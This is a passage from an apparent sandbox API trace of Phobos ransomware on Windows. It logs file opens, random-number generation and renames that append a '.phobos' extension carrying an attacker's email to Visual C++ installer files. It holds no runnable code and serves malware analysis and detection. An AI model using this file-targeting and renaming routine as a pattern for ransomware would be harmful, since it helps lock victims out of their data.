Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab")) returned 0 [0123.411] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.411] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0123.412] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=151552) returned 1 [0123.412] CloseHandle (hObject=0x330) returned 1 [0123.412] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi")) returned 0x20 [0123.412] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.412] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.412] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.412] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0123.413] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=821681) returned 1 [0123.413] CloseHandle (hObject=0x330) returned 1 [0123.413] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab")) returned 0x20 [0123.413] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.413] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.413] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.413] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0123.414] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=151552) returned 1 [0123.414] CloseHandle (hObject=0x330) returned 1 [0123.414] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi")) returned 0x20 [0123.414] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.414] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.415] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.415] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0123.471] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=654) returned 1 [0123.471] CloseHandle (hObject=0x348) returned 1 [0123.471] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm")) returned 0x20 [0123.471] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.472] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.472] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.472] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0123.593] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=5881317) returned 1 [0123.593] CloseHandle (hObject=0x334) returned 1 [0123.593] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab")) returned 0x20 [0123.593] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0 [0123.593] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab")) returned 0 [0123.594] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.594] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0123.594] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=766) returned 1 [0123.594] CloseHandle (hObject=0x334) returned 1 [0123.594] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm")) returned 0x20 [0123.594] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.594] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.594] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.594] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\vc_redist.x64.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0123.595] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=781880) returned 1 [0123.595] CloseHandle (hObject=0x334) returned 1 [0123.595] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\vc_redist.x64.exe")) returned 0x20 [0123.595] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\vc_redist.x64.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.595] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\vc_redist.x64.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.595] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.595] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0123.595] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=666) returned 1 [0123.595] CloseHandle (hObject=0x334) returned 1 [0123.595] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm")) returned 0x20 [0123.595] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.595] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.596] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.596] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0123.596] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=462976) returned 1 [0123.596] CloseHandle (hObject=0x334) returned 1 [0123.597] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe")) returned 0x20 [0123.597] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.597] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.597] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.597] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0123.597] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=766) returned 1 [0123.597] CloseHandle (hObject=0x334) returned 1 [0123.597] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm")) returned 0x20 [0123.597] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.597] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.597] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.598] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\vc_redist.x86.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0123.598] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=781872) returned 1 [0123.598] CloseHandle (hObject=0x334) returned 1 [0123.598] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\vc_redist.x86.exe")) returned 0x80 [0123.598] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\vc_redist.x86.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.598] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\vc_redist.x86.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.598] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.598] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0123.599] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=4932896) returned 1 [0123.599] CloseHandle (hObject=0x334) returned 1 [0123.599] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab")) returned 0x20 [0123.599] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0 [0123.599] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab")) returned 0 [0123.599] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.599] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0123.600] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=143360) returned 1 [0123.600] CloseHandle (hObject=0x334) returned 1 [0123.603] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi")) returned 0x20 [0123.603] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package 